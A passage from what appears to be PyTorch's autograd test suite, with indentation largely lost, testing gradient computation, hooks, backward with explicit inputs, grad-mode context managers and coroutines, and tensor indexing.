t2 = random.random()
t3 = random.random()
scale = random.randint(0, 10)
res = MyFunction.apply(t1, t2, scale, t3)
self.assertEqual(scale, res[0])
self.assertEqual((t1 + t2 * t3) * scale, res[1])
self.assertEqual(None, res[2])
self.assertEqual(True, res[3])
self.assertEqual((t1 * t2 + t3) * scale, res[4])
self.assertEqual("bar", res[5])
self.assertEqual(t1, res[6])
def test_invalid_gradients(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x * 2
@staticmethod
def backward(ctx, grad_output):
return torch.randn(10, dtype=torch.float)
with self.assertRaisesRegex(RuntimeError, 'expected shape'):
input = torch.randn(5, 5, dtype=torch.float, requires_grad=True)
MyFunction.apply(input).sum().backward()
def test_unrelated_inputs(self):
        # test to ensure grad(grad)check runs successfully even if there is an
        # unrelated (but differentiable) input
def my_function(x, y):
return x * x
x = torch.rand(10, dtype=torch.double, requires_grad=True)
y = torch.rand(10, dtype=torch.double, requires_grad=True)
gradcheck(my_function, (x, y))
gradgradcheck(my_function, (x, y))
def test_not_implemented_grad(self):
a = torch.rand(2, requires_grad=True)
# if grad for nextafter ends up being implemented, this should be changed
y = torch.nextafter(a, a).sum()
with self.assertRaisesRegex(
NotImplementedError,
'the derivative for .* is not implemented'):
y.backward()
def test_not_implemented_fwad(self):
x = torch.randn(3)
v = torch.rand(3)
mat = torch.randn(2, 3)
with fwAD.dual_level():
dual_x = fwAD.make_dual(x, v)
err_msg = r"Trying to use forward AD with .* that does not support it"
hint_msg = "Running forward AD for an OP that does not implement it should raise a NotImplementedError"
with self.assertRaisesRegex(NotImplementedError, err_msg, msg=hint_msg):
# if forward AD ends up being implemented for torch.mv, choose a different op
res = torch.mv(mat, dual_x)
def test_accumulate_grad(self):
grad_output = torch.ones(5, 5)
def compute_grad(create_graph):
x = torch.randn(5, 5, requires_grad=True)
y = x + 2
y.backward(grad_output, retain_graph=True)
x_grad = x.grad
x_grad_clone = x.grad.clone()
y.backward(grad_output, create_graph=create_graph)
return x_grad, x_grad_clone
# Accumulate in-place when create_graph is False
x_grad, x_grad_clone = compute_grad(create_graph=False)
self.assertEqual(x_grad, x_grad_clone * 2)
        # Accumulate out-of-place when create_graph is True
x_grad, x_grad_clone = compute_grad(create_graph=True)
self.assertEqual(x_grad, x_grad_clone)
def test_accumulate_grad_tensor_reference(self):
def _test_grad_tensor(params_grad_tensor, backward_grad_tensor, should_preserve_reference, create_graph):
params = torch.tensor([1.5, 1.5]).requires_grad_()
params.grad = params_grad_tensor
grad_saved = params.grad
params.backward(backward_grad_tensor, create_graph=create_graph)
self.assertEqual(id(grad_saved) == id(params.grad), should_preserve_reference)
for create_graph in (False, True):
# Accumulate dense gradient to sparse gradient will change the `params.grad` reference
_test_grad_tensor(
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
torch.tensor([1.5, 1.5]),
False, # never accumulates in-place
create_graph)
# Accumulate dense gradient to dense gradient will preserve the `params.grad` reference,
# but only if create_graph=False.
_test_grad_tensor(
torch.tensor([1.5, 1.5]),
torch.tensor([1.5, 1.5]),
not create_graph,
create_graph)
# Accumulate sparse gradient to sparse gradient will preserve the `params.grad` reference,
# but only if create_graph=False.
_test_grad_tensor(
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
not create_graph,
create_graph)
@skipIfNoLapack
def test_slogdet_sign(self):
a = torch.randn(3, 3, dtype=torch.double, requires_grad=True)
s, logdet = a.slogdet()
# test that sign should not require grad
self.assertFalse(s.requires_grad)
# test that backward through computation involving sign works
def sign_mul_logdet(mat):
s, logdet = mat.slogdet()
return s * logdet
u, s, v = a.detach().svd()
s.abs_().clamp_(0.0001)
for sign in (-1, 1):
s[-1] = sign
mat = torch.linalg.multi_dot([u, s.diag(), v.t()]).requires_grad_()
gradcheck(sign_mul_logdet, mat)
gradgradcheck(sign_mul_logdet, mat)
def test_sum_to_with_empty_dim_grad(self):
a = torch.rand(4, 0, requires_grad=True)
b = torch.rand(4, 1, requires_grad=True)
c = a + b
assert c.shape == (4, 0)
c.sum().backward()
self.assertEqual(b.grad, torch.zeros(4, 1))
self.assertEqual(a.grad, torch.zeros(4, 0))
def test_hessian_vector(self):
x = torch.randn(2, 2, requires_grad=True)
y = torch.randn(2, 2, requires_grad=True)
z = x ** 2 + y * x + y ** 2
z.backward(torch.ones(2, 2), create_graph=True)
with torch.no_grad():
x_grad = 2 * x + y
y_grad = x + 2 * y
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
grad_sum = 2 * x.grad + y.grad
grad_sum.backward(torch.ones(2, 2))
x_hv = torch.ones(2, 2) * 5
y_hv = torch.ones(2, 2) * 4
self.assertEqual(x.grad, x_grad + x_hv)
self.assertEqual(y.grad, y_grad + y_hv)
def test_grad(self):
x = torch.randn(2, 2, requires_grad=True)
y = torch.randn(2, 2, requires_grad=True)
z = x ** 2 + y * x + y ** 2
z.backward(torch.ones(2, 2), create_graph=True)
x_grad = 2 * x + y
y_grad = x + 2 * y
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
grad_sum = 2 * x.grad + y.grad
x_hv = torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[torch.ones(2, 2)],
inputs=[x], create_graph=True)
expected_x_hv = torch.ones(2, 2) * 5
expected_y_hv = torch.ones(2, 2) * 4
self.assertEqual(x_hv[0], expected_x_hv)
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
# Test that grad_outputs and outputs have the same shape
grad_out = torch.ones(2)
try:
torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[grad_out],
inputs=[x], create_graph=True)
            self.fail()
except RuntimeError as error:
self.assertEqual(str(error), "Mismatch in shape: grad_output[0] has a shape of "
+ str(grad_out.shape) + " and output[0] has a shape of "
+ str(grad_sum.shape) + ".")
def test_grad_nonleaf(self):
x_init = torch.randn(2, 2, requires_grad=True)
x = x_init
y = torch.randn(2, 2, requires_grad=True)
grad_output = torch.ones(2, 2)
def fn(x):
return x ** 2 + y * x + y ** 2
for _ in range(5):
grad_x, = torch.autograd.grad(
fn(x), x, grad_outputs=grad_output, create_graph=True)
grad_x_expected = 2 * x + y
self.assertIsNone(y.grad)
self.assertIsNone(x.grad)
self.assertEqual(grad_x, grad_x_expected)
x = x + 0.05 * grad_x
val_init = fn(x_init).sum()
val_final = fn(x).sum()
self.assertGreater(val_final, val_init)
x.backward(grad_output)
self.assertIsNotNone(y.grad)
self.assertIsNotNone(x_init.grad)
def test_grad_nonleaf_many_outputs(self):
# This checks an edge case for function callbacks
# We want to capture two grads of a function, but can only
# register a single callback.
x = torch.randn(4, 2, requires_grad=True)
a, b = x.chunk(2)
def hook(*grads):
hook_called[0] = True
hook_called = [False]
x.register_hook(hook)
go = torch.randn(2, 2)
grad_a, grad_b = torch.autograd.grad(
(a + 2 * b), [a, b], grad_outputs=go, create_graph=True)
self.assertEqual(grad_a, go)
self.assertEqual(grad_b, go * 2)
self.assertFalse(hook_called[0])
self.assertIsNone(x.grad)
def test_grad_nonleaf_register_hook(self):
# This checks an edge case for register_hook.
# We want to capture grad of a nonleaf tensor,
# but avoid segfault during backward of other nonleaf tensors
x = torch.randn(5, requires_grad=True)
x_list = x.unbind()
x0 = x_list[0]
hook_results = [None]
def hook(grad):
hook_results[0] = grad
x0.register_hook(hook)
x_list[0].backward()
self.assertEqual(hook_results[0], torch.tensor(1.))
expected_grad = torch.tensor([1., 0, 0, 0, 0])
self.assertEqual(x.grad, expected_grad)
self.assertIsNone(x_list[0].grad)
for i in range(1, 5, 1):
x_list[i].backward()
self.assertEqual(hook_results[0], None)
expected_grad[i] = 1.0
self.assertEqual(x.grad, expected_grad)
self.assertIsNone(x_list[i].grad)
def test_hook_with_no_name(self):
        # Create a hook that does not have a __name__ attribute
class MyHookClass:
def __call__(self, grad):
return grad.clone()
x = torch.randn(5, requires_grad=True).clone()
x.register_hook(MyHookClass())
x.sum().backward()
# Should run fine
def test_sharded_grad(self):
leaves = [torch.zeros(5, 5, requires_grad=True) for _ in range(10)]
intermediates = [l * i + l * l for i, l in enumerate(leaves)]
loss = sum(v * i for i, v in enumerate(intermediates)).sum()
# define a helper for dividing intermediates into groups
def group(l, group_size):
return (l[i:i + group_size] for i in range(0, len(l), group_size))
# Compute the d loss / d intermediates in chunks of shard_size
shard_size = 2
d_intermediates = [d_i for intermediates_batch in group(intermediates, shard_size)
for d_i in torch.autograd.grad(loss, intermediates_batch)]
# Compute rest of backward pass
torch.autograd.backward(intermediates, d_intermediates)
for i, l in enumerate(leaves):
self.assertEqual(l.grad, i * i * (1 + l))
def test_backward_badcalls(self):
x = torch.ones(1)
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
x.backward()
def test_grad_badcalls(self):
x = torch.ones(1)
y = x ** 2
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
torch.autograd.grad(x, y)
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
torch.autograd.grad(y, x)
x = torch.ones(1, requires_grad=True)
y = x ** 2
torch.autograd.grad(y, x) # this should succeed now
def test_grad_empty_inputs(self):
x = torch.tensor([1.0], requires_grad=True)
with self.assertRaisesRegex(ValueError, "grad requires non-empty inputs."):
torch.autograd.grad(2 * x, [], grad_outputs=torch.tensor([1.0]))
def test_grad_fn_badcalls(self):
error_regex = 'expected .* arguments, got .* instead'
x = torch.ones(1, requires_grad=True)
y = x ** 2
with self.assertRaisesRegex(TypeError, error_regex):
y.grad_fn(x.detach(), x.detach()) # too many
with self.assertRaisesRegex(TypeError, error_regex):
y.grad_fn() # too few
y.grad_fn(x.detach()) # this should succeed
def test_grad_unreachable(self):
x = torch.ones(1, requires_grad=True)
y = torch.ones(1, requires_grad=True)
# Make sure x and y have grad accumulators allocated
z = x * 2
w = y * 2
grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=True)
self.assertEqual(grad_x, x * 2)
self.assertIsNone(grad_y)
# This is slightly different from the case above, because z doesn't even
# have a grad accumulator allocated.
z = torch.ones(1, requires_grad=True)
grad_x, grad_z = torch.autograd.grad(x * 2, [x, z], allow_unused=True)
self.assertEqual(grad_x, x * 2)
self.assertIsNone(grad_z)
# allow_unused=False, but grads contains None inside, should throw
with self.assertRaisesRegex(RuntimeError,
"Set allow_unused=True"):
grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=False)
def test_grad_unreachable_discovery(self):
# Test that certain nodes are not erroneously executed when an input
# is unreachable. See #39784
class MyFunc(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
self.fail("This node should not be executed!")
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
(gY,) = torch.autograd.grad(x, (y, ), allow_unused=True)
self.assertIsNone(gY)
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
z = torch.randn(1, requires_grad=True)
(gY, gZ) = torch.autograd.grad(x + z, (y, z), allow_unused=True)
self.assertIsNone(gY)
self.assertIsNotNone(gZ)
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
torch.autograd.backward(x, inputs=(y, )) # allow_unused is implicitly True!
self.assertIsNone(y.grad)
def test_hooks(self):
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5) * 4
y.requires_grad_(True)
counter = [0]
def bw_hook(inc, grad):
self.assertIsInstance(grad, torch.Tensor)
counter[0] += inc
z = x ** 2 + x * 2 + x * y + y
x.register_hook(lambda *args: bw_hook(0, *args))
test = z.register_hook(lambda *args: bw_hook(1, *args))
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 1)
test2 = z.register_hook(lambda *args: bw_hook(2, *args))
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 4)
test2.remove()
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 5)
def bw_hook_modify(grad):
return grad.mul(2)
test.remove()
z.register_hook(bw_hook_modify)
with torch.no_grad():
y.grad.zero_()
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(y.grad, (x + 1) * 2)
y.register_hook(bw_hook_modify)
with torch.no_grad():
y.grad.zero_()
z.backward(torch.ones(5, 5))
self.assertEqual(y.grad, (x + 1) * 4)
def test_hooks_cpp(self):
# Tests hooks for autograd function implemented in C++
bn = torch.nn.BatchNorm1d(5, affine=False)
bn.double()
bn.eval()
counter = [0]
def bw_hook(grad):
counter[0] += 1
return grad * 2
x = torch.ones(5, 5, dtype=torch.double, requires_grad=True)
z = bn(x)
z.register_hook(bw_hook)
z.sum().backward()
self.assertEqual(counter[0], 1, msg='bw_hook not called')
self.assertEqual(x.grad, torch.ones(5, 5, dtype=torch.double) * 2, atol=1e-5, rtol=0)
def test_hook_none(self):
# WARNING: this is a test for autograd internals.
# You should never have to use such things in your code.
class NoneGradientFunction(Function):
@staticmethod
def forward(ctx, x, y):
assert ctx.needs_input_grad[0]
assert not ctx.needs_input_grad[1]
return x, y
@staticmethod
def backward(ctx, grad_x, grad_y):
return grad_x, None
was_called = [False]
def hook(grad):
self.assertIsNotNone(grad)
was_called[0] = True
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5)
rx, ry = NoneGradientFunction.apply(x, y)
rx.register_hook(hook)
ry.register_hook(hook)
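# builtin sum(rx, ry) adds each row of rx to ry, so both rx and ry receive
# real gradients and both hooks must fire with a non-None grad, even though
# the Function itself returns None for y's input gradient.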
sum(rx, ry).sum().backward()
self.assertTrue(was_called[0])
def test_retain_grad(self):
input = torch.rand(1, 3, requires_grad=True)
h1 = input * 3
out = (h1 * h1).sum()
# It should be possible to call retain_grad() multiple times
h1.retain_grad()
h1.retain_grad()
# Gradient should be accumulated
out.backward(retain_graph=True)
self.assertEqual(h1 * 2, h1.grad)
out.backward(retain_graph=True)
self.assertEqual(h1 * 4, h1.grad)
with torch.no_grad():
input.grad.zero_()
# It should be a no-op for leaves
input.retain_grad()
input.retain_grad()
out.backward()
self.assertEqual(input * 18, input.grad)
def test_retain_grad_cycle(self):
x = torch.ones(5, 5, requires_grad=True)
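# retain_grad() must not create a reference cycle that keeps y alive;
# the weak reference below should expire once run_test returns.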
def run_test():
y = x * 2
y.retain_grad()
return y / 2, torch._C._WeakTensorRef(y)
z, ref = run_test()
self.assertTrue(ref.expired())
z.sum().backward()
def test_backward(self):
v = torch.randn(5, 5, requires_grad=True)
x = torch.randn(5, 5, requires_grad=True)
y = (torch.rand(5, 5) + 0.1).requires_grad_(True)
z = torch.randn(5, 5, requires_grad=True)
grad_output = torch.randn(5, 5)
v.backward(grad_output)
self.assertEqual(v.grad, grad_output)
a = x + (y * z) + 4 * z ** 2 * x / y
a.backward(grad_output)
x_grad = 4 * z.pow(2) / y + 1
y_grad = z - 4 * x * z.pow(2) / y.pow(2)
z_grad = 8 * x * z / y + y
self.assertEqual(x.grad, x_grad * grad_output)
self.assertEqual(y.grad, y_grad * grad_output)
self.assertEqual(z.grad, z_grad * grad_output)
def test_sparse_mm_backward(self):
size = (3, 3)
sparse = torch.sparse_coo_tensor(size, requires_grad=True)
dense = torch.randn(size, requires_grad=True)
with self.assertRaisesRegex(
RuntimeError,
"The backward pass for this operation requires the 'mat1' tensor to be strided,"):
z = dense.addmm(sparse, dense)
mm_test_cases = [
# a requires grad, a is sparse, b requires grad, b is sparse, error message
(False, True, True, False, None),
(False, False, True, True, "The backward pass for this operation requires the 'mat2'"),
(False, True, True, True, "The backward pass for this operation requires the 'mat2'"),
(True, False, True, True, "The backward pass for this operation requires the 'mat2'"),
(True, True, False, False, "The backward pass for this operation requires the 'self'"),
(True, True, True, False, "The backward pass for this operation requires the 'self'"),
(True, True, True, True, "The backward pass for this operation requires the 'mat2'"),
]
for a_req_grad, a_is_sparse, b_req_grad, b_is_sparse, err_msg in mm_test_cases:
# We should only be testing cases with sparse inputs, and at least one
# input needs to require grad so we can call a backward pass
assert a_is_sparse or b_is_sparse
assert a_req_grad or b_req_grad
a = torch.randn(size, requires_grad=a_req_grad)
if a_is_sparse:
a = a.to_sparse()
b = torch.randn(size, requires_grad=b_req_grad)
if b_is_sparse:
b = b.to_sparse()
# If no error expected, check that sparse and dense cases match
if err_msg is None:
r = a.mm(b)
r.sum().backward()
a_grad = None if a.grad is None else a.grad.clone().detach()
b_grad = None if b.grad is None else b.grad.clone().detach()
# Redo with only dense tensors
a = (a.to_dense() if a.is_sparse else a).clone().detach()
a.requires_grad = a_req_grad
b = (b.to_dense() if b.is_sparse else b).clone().detach()
b.requires_grad = b_req_grad
r = a.mm(b)
r.sum().backward()
self.assertEqual(a_grad, a.grad)
self.assertEqual(b_grad, b.grad)
else:
with self.assertRaisesRegex(RuntimeError, err_msg):
a.mm(b)
def test_multi_backward(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
q = torch.randn(5, 5, requires_grad=True)
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
q2 = q * 2
z = x + y + q2
c = a * b + q2
grad_z = torch.randn(5, 5)
grad_c = torch.randn(5, 5)
torch.autograd.backward([z, c], [grad_z, grad_c])
self.assertEqual(x.grad, grad_z)
self.assertEqual(y.grad, grad_z)
self.assertEqual(a.grad, grad_c * b)
self.assertEqual(b.grad, grad_c * a)
self.assertEqual(q.grad, (grad_c + grad_z) * 2)
def test_multi_backward_no_grad(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=False)
z = x + y
q = y * 2
# NB: we currently raise an exception if any arguments to backward()
# have requires_grad=False and don't have a grad_fn. We may want to
# relax that check to a warning.
def call_backwards():
torch.autograd.backward([z, q], [torch.ones(5, 5), torch.ones(5, 5)])
self.assertRaises(RuntimeError, call_backwards)
def test_backward_with_inputs(self):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
def fn():
return x ** 2 + y * x + y ** 2
gradient = torch.ones(2, 2)
x_grad_expected = 2 * x + y
y_grad_expected = x + 2 * y
@torch.no_grad()
def reset_grad():
x.grad.zero_()
y.grad.zero_()
torch.autograd.backward(fn(), gradient, inputs=[x, y])
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(y.grad, y_grad_expected)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=[x])
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(y.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=[y])
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=y)
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
self.assertRaisesRegex(RuntimeError, 'cannot be empty',
lambda: torch.autograd.backward(fn(), gradient, inputs=[]))
def test_backward_with_nonleaf_inputs(self):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
x_nonleaf = x * 1
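# x_nonleaf is an intermediate (non-leaf) tensor; passing it via inputs=
# below makes backward() populate its .grad as well.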
y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
z = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
out = x_nonleaf ** 2 + y * x_nonleaf + y ** 2
out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[x, y, x_nonleaf])
x_grad_expected = 2 * x + y
y_grad_expected = x + 2 * y
x_non_leaf_expected = 2 * x_nonleaf + y
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(x_nonleaf.grad, x_non_leaf_expected)
# backward doesn't have an allow_unused flag, so when a variable is not
# part of the graph it behaves as if allow_unused were True:
# z.grad will simply be None.
out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[z])
self.assertIsNone(z.grad)
def test_dependent_backward(self):
x = torch.randn(10, requires_grad=True)
y = x ** 2
z = y ** 3
go_y = torch.randn(10)
go_z = torch.randn(10)
torch.autograd.backward([y, z], [go_y, go_z])
self.assertEqual(x.grad, 2 * x * go_y + 6 * x.pow(5) * go_z)
def test_save_output_nr(self):
x = torch.randn(10, requires_grad=True)
class MultiOutputFn(Function):
@staticmethod
def forward(ctx, x):
return x[:5], x[5:]
@staticmethod
def backward(ctx, *grad):
return torch.cat(grad)
a, b = MultiOutputFn.apply(x)
self.assertEqual(b.output_nr, 1)
class TestFn(Function):
@staticmethod
def forward(ctx, b):
ctx.save_for_backward(b)
return b * 2
@staticmethod
def backward(ctx, grad_b):
b, = ctx.saved_tensors
self.assertEqual(b.output_nr, 1)
TestFn.apply(b).sum().backward()
def test_free_deep_graph(self):
def scope():
depth = 150000
x = torch.randn(1, requires_grad=True)
y = x.clone()
# build a "chain" computation graph
for _ in range(depth):
y = y + y * 0.000001
# graph deletion occurs when the above locals go out of scope.
# In this case `del y` will trigger it but it's easier to leave
# it to Python to delete the locals.
# Should not stack overflow
scope()
def test_free_deep_graph_complicated(self):
def scope():
depth = 100000
randchoice = torch.randint(2, [depth, 2])
x = torch.randn(1, requires_grad=True)
y = x.clone()
# Hold the two previous values
prev_values = [None, None]
# Build a "chain with skip connections" graph
for _ in range(depth):
prev_tensors = [tensor for tensor in prev_values[:-1]
if tensor is not None]
prev_values.append(y)
prev_values.pop(0)
# Definitely pick one tensor to add
y += y * 0.000001
# Possibly add other tensors
nprev = len(prev_tensors)
if nprev == 2:
y += randchoice[depth].mul(torch.cat(prev_tensors)).sum()
# graph deletion occurs when the above locals go out of scope.
# Should not stack overflow
scope()
def test_free_deep_graph_pyfunction(self):
class MyOp(Function):
@staticmethod
def forward(ctx, tensor1, tensor2):
return tensor1 + tensor2
@staticmethod
def backward(ctx, grad_output):
return grad_output, grad_output
def scope():
depth = 150000
x = torch.randn(1, requires_grad=True)
y = x.clone()
# build deeply nested computation graph
for _ in range(depth):
y = MyOp.apply(y, y)
# graph deletion occurs when the above locals go out of scope.
# Should not stack overflow
scope()
def test_no_unnecessary_save(self):
# If we kept x in the derivative Function of x * 2 we would
# get an error in the backward that would complain that we've
# modified x, which was needed for gradient computation.
# Since we should elide unnecessary saves, this test should pass.
mu = torch.ones(1, requires_grad=True)
x = torch.empty(1)
loss = 0
for i in range(3):
x.detach_()
x.copy_(mu + i)
ft = torch.tensor([float(i)])
multiplied = x * ft
s = multiplied.sum()
loss += s
loss.backward()
def test_no_grad(self):
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5) * 4
with torch.no_grad():
w = x + y
@torch.no_grad()
def adder(x, y):
return x + y
z = adder(x, y)
self.assertFalse(w.requires_grad)
self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
self.assertIsNone(w.grad_fn)
self.assertFalse(z.requires_grad)
self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
self.assertIsNone(z.grad_fn)
# test nested decorator and with-statement on no_grad
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
w = adder(x, y)
self.assertFalse(torch.is_grad_enabled())
def test_set_grad_generator_functions(self):
@torch.no_grad()
def gen_no_grad():
for i in range(10):
self.assertEqual(torch.is_grad_enabled(), False)
yield i
with torch.enable_grad():
for _ in gen_no_grad():
self.assertEqual(torch.is_grad_enabled(), True)
@torch.enable_grad()
def gen_enable_grad():
for i in range(10):
self.assertEqual(torch.is_grad_enabled(), True)
yield i
with torch.no_grad():
for _ in gen_enable_grad():
self.assertEqual(torch.is_grad_enabled(), False)
def test_set_grad_generator_functions_recursive(self):
# enable_grad_decorator_recursive and no_grad_decorator_recursive call each other
# recursively, to ensure that the decorators preserve the caller's setting
@torch.enable_grad()
def enable_grad_decorator_recursive(depth):
self.assertTrue(torch.is_grad_enabled())
if depth > 0:
no_grad_decorator_recursive(depth - 1)
self.assertTrue(torch.is_grad_enabled())
@torch.no_grad()
def no_grad_decorator_recursive(depth):
self.assertFalse(torch.is_grad_enabled())
if depth > 0:
enable_grad_decorator_recursive(depth - 1)
self.assertFalse(torch.is_grad_enabled())
# enable_grad_context_manager_recursive and no_grad_context_manager_recursive call
# each other recursively, to ensure that the decorators preserve the caller's setting
def enable_grad_context_manager_recursive(depth):
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
if depth > 0:
no_grad_context_manager_recursive(depth - 1)
self.assertTrue(torch.is_grad_enabled())
def no_grad_context_manager_recursive(depth):
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
if depth > 0:
enable_grad_context_manager_recursive(depth - 1)
self.assertFalse(torch.is_grad_enabled())
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
enable_grad_decorator_recursive(10)
self.assertTrue(torch.is_grad_enabled())
enable_grad_context_manager_recursive(10)
self.assertTrue(torch.is_grad_enabled())
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
enable_grad_decorator_recursive(10)
self.assertFalse(torch.is_grad_enabled())
enable_grad_context_manager_recursive(10)
self.assertFalse(torch.is_grad_enabled())
def test_set_grad_coroutines(self):
@torch.no_grad()
def coro_no_grad(n=10):
self.assertFalse(torch.is_grad_enabled())
for i in range(n):
self.assertFalse(torch.is_grad_enabled())
r = yield i
self.assertFalse(torch.is_grad_enabled())
self.assertEqual(i, r)
self.assertFalse(torch.is_grad_enabled())
@torch.enable_grad()
def coro_enable_grad(n=10):
self.assertTrue(torch.is_grad_enabled())
for i in range(n):
self.assertTrue(torch.is_grad_enabled())
r = yield i
self.assertTrue(torch.is_grad_enabled())
self.assertEqual(i, r)
self.assertTrue(torch.is_grad_enabled())
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
coro, r = coro_no_grad(), None
try:
while True:
self.assertTrue(torch.is_grad_enabled())
r = coro.send(r)
self.assertTrue(torch.is_grad_enabled())
except StopIteration:
pass
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
coro, r = coro_enable_grad(), None
try:
while True:
self.assertFalse(torch.is_grad_enabled())
r = coro.send(r)
self.assertFalse(torch.is_grad_enabled())
except StopIteration:
pass
def test_set_grad_coroutines_benign_exceptions(self):
class RecoverableException(Exception):
pass
@torch.no_grad()
def coro_no_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertFalse(torch.is_grad_enabled())
yield (-i if has_raised else i)
except RecoverableException:
self.assertFalse(torch.is_grad_enabled())
has_raised = True
@torch.enable_grad()
def coro_enable_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertTrue(torch.is_grad_enabled())
yield (-i if has_raised else i)
except RecoverableException:
self.assertTrue(torch.is_grad_enabled())
has_raised = True
with torch.enable_grad():
coro = coro_no_grad()
assert 0 == next(coro)
try:
while True:
r = coro.throw(RecoverableException)
self.assertLess(r, 0)
except StopIteration:
pass
with torch.no_grad():
coro = coro_enable_grad()
assert 0 == next(coro)
try:
while True:
r = coro.throw(RecoverableException)
self.assertLess(r, 0)
except StopIteration:
pass
def test_set_grad_coroutines_critical_exceptions(self):
class UnrecoverableException(Exception):
pass
class SecondaryException(Exception):
pass
@torch.no_grad()
def coro_no_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertFalse(torch.is_grad_enabled())
yield (-i if has_raised else i)
except UnrecoverableException:
self.assertFalse(torch.is_grad_enabled())
raise SecondaryException
@torch.enable_grad()
def coro_enable_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertTrue(torch.is_grad_enabled())
yield (-i if has_raised else i)
except UnrecoverableException:
self.assertTrue(torch.is_grad_enabled())
raise SecondaryException
with torch.enable_grad():
coro = coro_no_grad()
assert 0 == next(coro)
with self.assertRaises(SecondaryException):
coro.throw(UnrecoverableException)
with torch.no_grad():
coro = coro_enable_grad()
assert 0 == next(coro)
with self.assertRaises(SecondaryException):
coro.throw(UnrecoverableException)
def test_set_grad_coroutines_exit(self):
@torch.no_grad()
def coro_no_grad(state):
for i in range(10):
try:
self.assertFalse(torch.is_grad_enabled())
yield i
except GeneratorExit:
self.assertFalse(torch.is_grad_enabled())
state.add('GeneratorExit')
raise
@torch.enable_grad()
def coro_enable_grad(state):
for i in range(10):
try:
self.assertTrue(torch.is_grad_enabled())
yield i
except GeneratorExit:
self.assertTrue(torch.is_grad_enabled())
state.add('GeneratorExit')
raise
state = set()
with torch.enable_grad():
coro = coro_no_grad(state)
for i in range(5):
next(coro)
coro.close()
self.assertTrue('GeneratorExit' in state)
state = set()
with torch.no_grad():
coro = coro_enable_grad(state)
for i in range(5):
next(coro)
coro.close()
self.assertTrue('GeneratorExit' in state)
def test_no_grad_python_function(self):
"""Python Functions should respect grad mode."""
x = torch.ones(5, 5, requires_grad=True)
class MyOp(Function):
@staticmethod
def forward(self, x):
return x + 1
@staticmethod
def backward(self, dy):
return dy
with torch.no_grad():
y = MyOp.apply(x)
self.assertFalse(y.requires_grad)
def test_indexing(self):
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
def compare(x, y, idx, indexed_tensor, indexed_var):
indexed_var_t = indexed_var.data
if not isinstance(indexed_tensor, torch.Tensor):
indexed_var_t = indexed_var_t[0]
self.assertEqual(indexed_tensor, indexed_var_t)
indexed_var.sum().backward()
expected_grad = torch.empty(x.size()).fill_(0)
expected_grad[idx] = 1
self.assertEqual(y.grad, expected_grad)
def check_index(x, y, idx):
if y.grad is not None:
with torch.no_grad():
y.grad.zero_()
indexed_tensor = x[idx]
indexed_var = y[idx]
compare(x, y, idx, indexed_tensor, indexed_var)
check_index(x, y, 1)
